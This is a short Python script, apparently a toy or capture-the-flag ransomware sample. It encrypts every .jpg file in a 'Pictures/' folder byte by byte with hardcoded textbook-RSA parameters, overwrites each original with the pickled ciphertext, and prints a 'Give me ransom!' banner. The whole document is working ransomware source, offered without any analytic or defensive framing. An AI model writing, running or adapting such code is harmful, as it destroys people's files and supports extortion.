#!/usr/bin/env python3

import os
import sys
import pickle

def encrypt(n, e, file):
    plain_bytes = b''
    with open(file, 'rb') as f:
        plain_bytes = f.read()
    cipher_int = [pow(i, e, n) for i in plain_bytes]
    with open(file, 'wb') as f:
        pickle.dump(cipher_int, f)

def main():
    # n = int(sys.argv[1])
    # e = int(sys.argv[2])
    # path = sys.argv[3]
    n = 22291846172619859445381409012451 
    e = 65535
    path = 'Pictures/'

    files = os.listdir(path)
    for file in files:
        filename = os.path.join(path, file)
        if filename.endswith('jpg'):
            encrypt(n, e, filename)
    print( \
 """///////////////////////////////////////////////////
//////////    ERROR!!!!              //////////////
//////////    Give me ransom!        //////////////
///////////////////////////////////////////////////""")

if __name__ == '__main__':
    main()


